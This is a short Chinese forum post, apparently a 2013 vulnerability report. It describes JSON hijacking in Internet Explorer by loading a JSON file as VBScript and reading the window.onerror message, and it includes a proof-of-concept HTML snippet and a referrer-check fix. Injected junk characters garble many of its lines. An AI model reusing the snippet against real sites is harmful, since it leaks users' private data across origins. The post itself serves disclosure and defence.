简要描述:
8 E4 V, I5 x3 S' O# t( B* E
4 c* O( u, m$ Q! T由于某些资源容器对数据处理不当导致json劫持漏洞.
% R2 ?& P" ~3 r% _! q详细说明:
; `/ {+ l. y7 l3 X2 y4 V由于ie支持vbscript,所以script元素可以指定成vbscript语言:
% k. M! l3 E% ` T% `% x: C- Q<script language=vbscript></script>
$ Z' U% D1 c7 @/ e& E
; q3 d+ c9 V3 v- v# H当但我们指定的是一个js格式的文件是将会发现一个异常,这使我们通过捕获这个异常的信息来获得部分json数据.$ d4 a4 ?" E4 d5 o* o, s, H
漏洞证明:0 j; i: x3 F d' S9 x9 e. D: d$ y
<script>" O1 {: `; z# }( N1 L
window.onerror=function(_){
" x: Z/ ?5 Y5 N0 nalert(_). E C' h( j7 [0 q4 r5 O* T n
}9 \! a( E& A) w! {3 N/ w
</script>9 L) m8 Q* P" ^8 \' u6 y( U* b( {
<script language=vbscript src=1.json></script>9 J7 F( E; E0 B& U% l
! f: V1 Z, g- m# f8 k( h* D
4 x2 Q: w' J- o6 s
1.json:; w4 a- {# }! r: F
[{"name":"sogili","age":19}]
* X0 o4 Q$ d! q( O# w修复方案:* i; D3 T, o; s" e5 f
网站业务对于这个问题可以通过验证referrer是否为同源来防御 |
发表于 2013-2-23 11:33:57
收藏
支持
反对